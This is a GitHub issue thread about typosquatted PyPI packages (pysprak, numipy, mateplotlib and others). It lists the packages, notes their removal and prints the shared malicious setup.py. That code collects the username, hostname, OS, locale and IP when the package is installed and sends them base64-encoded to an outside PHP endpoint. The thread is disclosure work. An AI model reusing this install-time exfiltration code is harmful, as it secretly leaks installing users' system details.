Malware packages on PyPI
zt2 opened this issue · comments
Those projects will steal user information when some one use pip to install them:
pyymal
pysprak
libhtml5
libcurl
python-mysql
mateplotlib
numipy
openvc
thanks for report @zt2, please consider submitting via our published security policy in the future...
reviewing now.
The following packages were removed under our typosquatting policy and the user was destroyed.
libcurl
libhtml5
mateplotlib
nmap-python
numipy
openvc
pysprak
python-mongo
python-mysql
python-openssl
PyYMAL
The malicious setup.py contents for all packages that were removed:
def checkVersion():
user_name = getpass.getuser()
hostname = socket.gethostname()
os_version = platform.platform()
if platform.system() is 'Windows':
import ctypes
import locale
dll_handle = ctypes.windll.kernel32
loc_lang = locale.getdefaultlocale()
language = ':'.join(loc_lang)
elif platform.system() is 'Linux':
loc_lang = os.popen("echo $LANG")
language = loc_lang.rea
ip = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
package='pysprak'
vid = user_name+"###"+hostname+"###"+os_version+"###"+ip+"###"+package
if sys.version_info>(3,0):
request.urlopen(r'http://numipy.openvc.org/spark.php',data='vid='.encode('utf-8')+base64.b64encode(vid.encode('utf-8')))
elif sys.version_info<(3,0):
urllib.urlopen(r'http://numipy.openvc.org/spark.php','vid='+base64.encodestring(vid))
checkVersion()
@ewdurbin Maybe an issue template named "security/malware report", whose contents tell the user to submit according to policy instead, would be helpful?